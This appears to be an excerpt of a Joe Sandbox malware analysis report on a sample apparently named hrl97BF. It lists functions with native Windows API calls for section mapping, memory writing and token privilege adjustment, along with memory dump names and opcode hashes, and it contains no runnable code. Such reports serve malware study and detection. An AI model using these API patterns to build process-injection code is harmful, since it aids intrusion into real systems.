Instruction Fuzzy Hash: 88E0D8F13505053BFB585B1ACC07FB7211CDB80601F08C504F918D8180E5F6DF504674

Function 00478535 Relevance: 3.1, APIs: 2, Instructions: 66nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 004784F0: NtOpenSection.NTDLL(?,0000000E), ref: 0047851F

NtMapViewOfSection.NTDLL(00000000,?,?,00000000,0000B7C4,00000000,?,00000002,00100000,00000040), ref: 00478565
CloseHandle.KERNEL32(00000000,0000B7C4,00000000,?,00000002,00100000,00000040,00000000,0000B7C4,00000000,?,004767D6), ref: 0047856D

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: Section$CloseHandleOpenView
String ID:
API String ID: 2731707328-0
Opcode ID: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
Instruction ID: b393d387223e583d58dcf3be0b45be934a1b618d469cdfc02fdb4df324adb63e
Opcode Fuzzy Hash: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
Instruction Fuzzy Hash: 42213D30340506BAD724DE26C85AFEAB369AF80744F80811DF40DAE281EFB5AE15876C

Function 7FE324EB Relevance: 3.1, APIs: 2, Instructions: 66nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 7FE324A6: NtOpenSection.NTDLL(?,0000000E), ref: 7FE324D5

NtMapViewOfSection.NTDLL(00000000,?,?,00000000,0000A5A4,00000000,?,00000002,00100000,00000040), ref: 7FE3251B
CloseHandle.KERNEL32(00000000,0000A5A4,00000000,?,00000002,00100000,00000040,00000000,0000A5A4,00000000,?,7FE3081E), ref: 7FE32523

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: Section$CloseHandleOpenView
String ID:
API String ID: 2731707328-0
Opcode ID: d57de25e2a9e0870f79673598bd885887cfcbdd2de40fd78df44cfc9adbced58
Instruction ID: bee1c855c16bc61800ea428020f6ca64b574a67132473be0581a367c0eaae25c
Opcode Fuzzy Hash: d57de25e2a9e0870f79673598bd885887cfcbdd2de40fd78df44cfc9adbced58
Instruction Fuzzy Hash: D3214D30B41706BBDB24DE25CC99FAA7369EF91615F800118F84A9E094DBB0BF05CB96

Function 7FE31399 Relevance: 3.0, APIs: 2, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FE313D1
NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FE313E1

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 3615134276-0
Opcode ID: 06cb91745a521b86393166955c5c3afe83ac66ea4f770f9a12dd5b551f424793
Instruction ID: c1c1ab654349933eb8818b114bb595f6400d348302ddc4a0bc7520d30974f20a
Opcode Fuzzy Hash: 06cb91745a521b86393166955c5c3afe83ac66ea4f770f9a12dd5b551f424793
Instruction Fuzzy Hash: E4F02732542420BBD7201F42CC8EED77F28EF537A0F044456F4484E152C2A28BA5D3F4

Function 00478438 Relevance: 3.0, APIs: 2, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,00000040), ref: 0047845C
NtWriteVirtualMemory.NTDLL ref: 00478465

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: MemoryVirtual$ProtectWrite
String ID:
API String ID: 151266762-0
Opcode ID: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
Instruction ID: 6bbb67ea70d6ee96dfa5f1d7b4d314b28acc786a60d934acbd3f762ecc45b662
Opcode Fuzzy Hash: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
Instruction Fuzzy Hash: 2AE012E07502007FF5185F55DC5FF7B391DDB41751F410208FA0A981C4F9A15E18467A

Function 7FE323EE Relevance: 3.0, APIs: 2, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,00000040), ref: 7FE32412
NtWriteVirtualMemory.NTDLL ref: 7FE3241B

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: MemoryVirtual$ProtectWrite
String ID:
API String ID: 151266762-0
Opcode ID: 534548baa2052e911e8d62c03dc4c028d0ed02b2351596322006dfeadd0b54f5
Instruction ID: c38bda1e3a101e2fdd3f8b0b268324223328f149a1f706d2aad4996337be3d8a
Opcode Fuzzy Hash: 534548baa2052e911e8d62c03dc4c028d0ed02b2351596322006dfeadd0b54f5
Instruction Fuzzy Hash: 69E0E2A07502007FFA185A299C5BF7B391DDB80B41F810208FA0A98180FAE26F1486BA

Function 7FE313C1 Relevance: 3.0, APIs: 2, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FE313D1
NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FE313E1

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 3615134276-0
Opcode ID: 03410179fabc8902f2c006e492dd7336ccf3c81071a106955ee4cf51594df4cc
Instruction ID: 2757d4dcf4212f89d011a90f07cb8bff029887feb5f377fd6fe999df64044c2d
Opcode Fuzzy Hash: 03410179fabc8902f2c006e492dd7336ccf3c81071a106955ee4cf51594df4cc
Instruction Fuzzy Hash: 8AD09E316420347BD6711E168C0EEDB7E1DEF57BB1F014045F90C99192C5A28EA1C7F5

Function 004773E3 Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000001,00000000,00000000,00000002), ref: 0047742B

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
Instruction ID: ddbff97e699881e74d61e2820170bd54818263a6fff0c1519b9bac5ac29647fb
Opcode Fuzzy Hash: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
Instruction Fuzzy Hash: 5BF0AE36542510BBD7205F56CD8EED77F28EF533A0F144556F4484E151C2624BA5D3F4

Function 0047740B Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000001,00000000,00000000,00000002), ref: 0047742B

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
Instruction ID: ee32c209e3d0a2de55b6acbdbca8a3d00d8b73f2470e3acbbab87dcaf3c2c19a
Opcode Fuzzy Hash: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
Instruction Fuzzy Hash: F2D06731643034BBD6312A568C0EEE77D1DEF577A0F015041F9089A1A1C5A28EA1C7F5

Function 00478889 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
Instruction ID: 2c1d06b0ef092043c03be5c4b92301d897a7a107ee02334de014fe54047685a1
Opcode Fuzzy Hash: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
Instruction Fuzzy Hash: 4E311EB16006154BDB148E38C8447EAB3E1FB84704F10C53DE65AE7680EA79EA498BC5

Function 006F28C8 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
Instruction ID: 51613a3b3d3215fcd316f45095e4f2adff35fefad49d85e9a5315333e5fab7fa
Opcode Fuzzy Hash: 0642b33d3ce8112a54256d33be083f0dc48b56f423af93a4a8a3c14605054926
Instruction Fuzzy Hash: F3311C3161061A8FDB148E39C8517AAB3E2FB94304F10853CE656D7684D6B5FA998FC0

Function 0041A736 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

